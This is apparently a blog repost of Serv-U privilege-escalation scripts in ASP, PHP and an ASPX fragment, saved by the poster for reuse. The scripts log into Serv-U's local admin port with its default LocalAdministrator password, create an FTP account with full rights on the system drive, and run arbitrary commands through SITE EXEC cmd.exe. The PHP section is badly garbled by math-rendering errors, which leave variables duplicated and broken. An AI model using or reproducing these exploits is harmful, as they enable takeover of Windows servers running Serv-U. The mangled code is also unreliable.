脚本:网站的编辑语言
serv-u利用脚本(asp/aspx/php)
serv-u利用脚本(asp/aspx/php)
每次用都得搜,说不准那天就搜不到了,直接存起来是最好的选择.
<%@ LANGUAGE = VBScript %>
<%
'Serv-U asp 提权程序
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request(“action”)
if not isnumeric(action) then response.end
user = trim(request(“u”))
pass = trim(request(“p”))
port = trim(request(“port”))
cmd = trim(request(“c”))
f=trim(request(“f”))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = “User " & user & vbCrLf
loginpass = “Pass " & pass & vbCrLf
deldomain = “-DELETEDOMAIN” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & " PortNo=” & ftpport & vbCrLf
mt = “SITE MAINTENANCE” & vbCrLf
newdomain = “-SETDOMAIN” & vbCrLf & “-Domain=goldsun|0.0.0.0|” & ftpport & “|-1|1|0” & vbCrLf & “-TZOEnable=0” & vbCrLf & " TZOKey=” & vbCrLf
newuser = “-SETUSERSETUP” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & “-PortNo=” & ftpport & vbCrLf & “-User=go” & vbCrLf & “-Password=od” & vbCrLf & _
“-HomeDir=c://” & vbCrLf & “-LoginMesFile=” & vbCrLf & “-Disable=0” & vbCrLf & “-RelPaths=1” & vbCrLf & _
“-NeedSecure=0” & vbCrLf & “-HideHidden=0” & vbCrLf & “-AlwaysAllowLogin=0” & vbCrLf & “-ChangePassword=0” & vbCrLf & _
“-QuotaEnable=0” & vbCrLf & “-MaxUsersLoginPerIP=-1” & vbCrLf & “-SpeedLimitUp=0” & vbCrLf & “-SpeedLimitDown=0” & vbCrLf & _
“-MaxNrUsers=-1” & vbCrLf & “-IdleTimeOut=600” & vbCrLf & “-SessionTimeOut=-1” & vbCrLf & “-Expire=0” & vbCrLf & “-RatioUp=1” & vbCrLf & _
“-RatioDown=1” & vbCrLf & “-RatiosCredit=0” & vbCrLf & “-QuotaCurrent=0” & vbCrLf & “-QuotaMaximum=0” & vbCrLf & _
“-Maintenance=System” & vbCrLf & “-PasswordType=Regular” & vbCrLf & “-Ratios=None” & vbCrLf & " Access=c://|RWAMELCDP" & vbCrLf
quit = “QUIT” & vbCrLf
newuser=replace(newuser,“c:”,f)
select case action
case 1
set a=Server.CreateObject(“Microsoft.XMLHTTP”)
a.open “GET”, “http://127.0.0.1:” & port & “/goldsun/upadmin/s1”,True, “”, “”
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session(“a”)=a
%>
<% case 3 set c=Server.CreateObject("Microsoft.XMLHTTP") c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", "" c.send loginuser & loginpass & mt & deldomain & quit set session("c")=c %>
提权完毕,已执行了命令:
<%=cmd%>
<%
case else
on error resume next
set a=session(“a”)
set b=session(“b”)
set c=session(“c”)
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
%>
Serv-U 提升权限 ASP版 Goldsun[at]84823714 |
用户名: |
|
口 令: |
|
端 口: |
|
系统路径: |
|
命 令: |
|
<% end select function Gpath() on error resume next err.clear set f=Server.CreateObject("Scripting.FileSystemObject") if err.number>0 then gpath="c:" exit function end if gpath=f.GetSpecialFolder(0) gpath=lcase(left(gpath,2)) set f=nothing end function Function GName() If request.servervariables("SERVER_PORT")="80" Then GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name")) Else GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name")) End If End Function %> ============================================================================================ //变量初始化
$addr = ‘0.0.0.0’;
$ftpport = 21;
$adminport = 43958;
$adminuser = ‘LocalAdministrator’;
KaTeX parse error: Expected 'EOF', got '#' at position 14: adminpass = '#̲l@ak#.lk;0@P’;
$user = ‘wofeiwo’;
$password = ‘wrsky’;
$homedir = ‘C://’;
$dir = ‘C://WINNT//System32//’;
//有改变则赋值
if ($_GET){
$addr = $_GET[‘addr’] ;
$ftpport = $_GET[‘ftpport’] ;
$adminport = $_GET[‘adminport’] ;
$adminuser = $_GET[‘adminuser’] ;
$adminpass = $_GET[‘adminpass’] ;
$user = $_GET[‘user’] ;
$password = $_GET[‘password’] ;
$homedir = G E T [ ′ h o m e d i r ′ ] ; i f ( _GET['homedir'] ; if ( GET[′homedir′];if(_GET[‘dir’]){
$dir = $_GET[‘dir’] ;
}
}
?>
-=
Serv-U All Version本地提升权限Exp10it Ver 1.5
添加Serv-U用户部分
主机IP: |
|
主机Ftp端口: |
|
主机Ftp管理端口: |
|
主机Ftp管理用户: |
|
主机Ftp管理密码: |
|
添加的用户名: |
|
添加的用户名密码: |
|
用户主目录(别忘了写"/"): |
|
|
|
命令回显:
//添加用户
if (KaTeX parse error: Expected '}', got 'EOF' at end of input: …n']=="up"){ up(addr, f t p p o r t , ftpport, ftpport,adminport, a d m i n u s e r , adminuser, adminuser,adminpass, u s e r , user, user,password,$homedir);
}
?>
执行命令部分
主机Ftp端口: |
|
用户名: |
|
用户名密码: |
|
系统路径(别忘了写"/"): |
|
执行的命令: |
|
命令回显: //执行命令
if (KaTeX parse error: Expected '}', got 'EOF' at end of input: …cute"){ ftpcmd(ftpport, u s e r , user, user,password, d i r , dir, dir,_GET[‘cmd’]);
}
?>
Copycenter (C) 2004
我非我 All centers Reserved.
//添加用户主函数定义
function up( a d d r , addr, addr,ftpport, a d m i n p o r t , adminport, adminport,adminuser, a d m i n p a s s , adminpass, adminpass,user, p a s s w o r d , password, password,homedir){
$fp = fsockopen (“127.0.0.1”, $adminport, $errno, e r r s t r , 8 ) ; i f ( ! errstr, 8); if (! errstr,8);if(!fp) {
echo “ e r r s t r ( errstr ( errstr(errno)
/n”;
} else {
fputs ( f p , " U S E R " . fp, "USER ". fp,"USER".adminuser."/r/n");
sleep (1);
fputs ( f p , " P A S S " . fp, "PASS ". fp,"PASS".adminpass."/r/n");
sleep (1);
fputs ( f p , " S I T E M A I N T E N A N C E / r / n " ) ; s l e e p ( 1 ) ; f p u t s ( fp, "SITE MAINTENANCE/r/n"); sleep (1); fputs ( fp,"SITEMAINTENANCE/r/n");sleep(1);fputs(fp, “-SETUSERSETUP/r/n”);
fputs ( f p , " − I P = " . fp, "-IP=". fp,"−IP=".addr."/r/n");
fputs ( f p , " − P o r t N o = " . fp, "-PortNo=". fp,"−PortNo=".ftpport."/r/n");
fputs ( f p , " − U s e r = " . fp, "-User=". fp,"−User=".user."/r/n");
fputs ( f p , " − P a s s w o r d = " . fp, "-Password=". fp,"−Password=".password."/r/n");
fputs ( f p , " − H o m e D i r = " . fp, "-HomeDir=". fp,"−HomeDir=".homedir."/r/n");
fputs ( f p , " − L o g i n M e s F i l e = / r / n " ) ; f p u t s ( fp, "-LoginMesFile=/r/n"); fputs ( fp,"−LoginMesFile=/r/n");fputs(fp, “-Disable=0/r/n”);
fputs ( f p , " − R e l P a t h s = 0 / r / n " ) ; f p u t s ( fp, "-RelPaths=0/r/n"); fputs ( fp,"−RelPaths=0/r/n");fputs(fp, “-NeedSecure=0/r/n”);
fputs ( f p , " − H i d e H i d d e n = 0 / r / n " ) ; f p u t s ( fp, "-HideHidden=0/r/n"); fputs ( fp,"−HideHidden=0/r/n");fputs(fp, “-AlwaysAllowLogin=0/r/n”);
fputs ( f p , " − C h a n g e P a s s w o r d = 1 / r / n " ) ; f p u t s ( fp, "-ChangePassword=1/r/n"); fputs ( fp,"−ChangePassword=1/r/n");fputs(fp, “-QuotaEnable=0/r/n”);
fputs ( f p , " − M a x U s e r s L o g i n P e r I P = − 1 / r / n " ) ; f p u t s ( fp, "-MaxUsersLoginPerIP=-1/r/n"); fputs ( fp,"−MaxUsersLoginPerIP=−1/r/n");fputs(fp, “-SpeedLimitUp=-1/r/n”);
fputs ( f p , " − S p e e d L i m i t D o w n = − 1 / r / n " ) ; f p u t s ( fp, "-SpeedLimitDown=-1/r/n"); fputs ( fp,"−SpeedLimitDown=−1/r/n");fputs(fp, “-MaxNrUsers=-1/r/n”);
fputs ( f p , " − I d l e T i m e O u t = 600 / r / n " ) ; f p u t s ( fp, "-IdleTimeOut=600/r/n"); fputs ( fp,"−IdleTimeOut=600/r/n");fputs(fp, “-SessionTimeOut=-1/r/n”);
fputs ( f p , " − E x p i r e = 0 / r / n " ) ; f p u t s ( fp, "-Expire=0/r/n"); fputs ( fp,"−Expire=0/r/n");fputs(fp, “-RatioUp=1/r/n”);
fputs ( f p , " − R a t i o D o w n = 1 / r / n " ) ; f p u t s ( fp, "-RatioDown=1/r/n"); fputs ( fp,"−RatioDown=1/r/n");fputs(fp, “-RatiosCredit=0/r/n”);
fputs ( f p , " − Q u o t a C u r r e n t = 0 / r / n " ) ; f p u t s ( fp, "-QuotaCurrent=0/r/n"); fputs ( fp,"−QuotaCurrent=0/r/n");fputs(fp, “-QuotaMaximum=0/r/n”);
fputs ( f p , " − M a i n t e n a n c e = S y s t e m / r / n " ) ; f p u t s ( fp, "-Maintenance=System/r/n"); fputs ( fp,"−Maintenance=System/r/n");fputs(fp, “-PasswordType=Regular/r/n”);
fputs ( f p , " − R a t i o s = N o n e / r / n " ) ; f p u t s ( fp, "-Ratios=None/r/n"); fputs ( fp,"−Ratios=None/r/n");fputs(fp, " Access=". h o m e d i r . " ∣ R W A M E L C D P / r / n " ) ; f p u t s ( homedir."|RWAMELCDP/r/n"); fputs ( homedir."∣RWAMELCDP/r/n");fputs(fp, “QUIT/r/n”);
sleep (1);
while (!feof(KaTeX parse error: Expected '}', got 'EOF' at end of input: … { echo fgets (fp,128);
}
}
}
//执行命令主函数定义
function ftpcmd( f t p p o r t , ftpport, ftpport,user, p a s s w o r d , password, password,dir,$cmd){
$conn_id = fsockopen (“127.0.0.1”, $ftpport, $errno, $errstr, 8);
if (!KaTeX parse error: Expected '}', got 'EOF' at end of input: …nn_id) { echo "errstr (KaTeX parse error: Expected 'EOF', got '}' at position 16: errno)
/n"; }̲ else { fputs (conn_id, "USER ". u s e r . " / r / n " ) ; s l e e p ( 1 ) ; f p u t s ( user."/r/n"); sleep (1); fputs ( user."/r/n");sleep(1);fputs(conn_id, "PASS ". p a s s w o r d . " / r / n " ) ; s l e e p ( 1 ) ; f p u t s ( password."/r/n"); sleep (1); fputs ( password."/r/n");sleep(1);fputs(conn_id, “SITE EXEC “. d i r . " c m d . e x e / c " . dir."cmd.exe /c ". dir."cmd.exe/c".cmd.”/r/n”);
fputs ( c o n n i d , " Q U I T / r / n " ) ; s l e e p ( 1 ) ; w h i l e ( ! f e o f ( conn_id, "QUIT/r/n"); sleep (1); while (!feof( connid,"QUIT/r/n");sleep(1);while(!feof(conn_id)) {
echo fgets (KaTeX parse error: Expected 'EOF', got '}' at position 15: conn_id,128); }̲ fclose(conn_id);
}
}
//去除转义字符
function stripslashes_array(&KaTeX parse error: Expected '}', got 'EOF' at end of input: … { while (list(key, v a r ) = e a c h ( var) = each( var)=each(array)) {
if ($key != ‘argc’ && KaTeX parse error: Expected 'EOF', got '&' at position 15: key != 'argv' &̲& (strtoupper(key) != k e y ∣ ∣ ′ ′ . i n t v a l ( key || ''.intval( key∣∣′′.intval(key) == "KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (is_string(var)) {
a r r a y [ array[ array[key] = stripslashes(KaTeX parse error: Expected 'EOF', got '}' at position 7: var); }̲ if (is_array(var)) {
a r r a y [ array[ array[key] = stripslashes_array($var);
}
}
}
return $array;
}
?>
<%@ Page Language=“VB” Debug=“true” %>
<%@ import Namespace=“System.Net.Sockets” %>
from Serv-U 2 admin by lake2
Name LocalAdministrator
PWD #l@$ak#.lk;0@P
Port 43958
cmd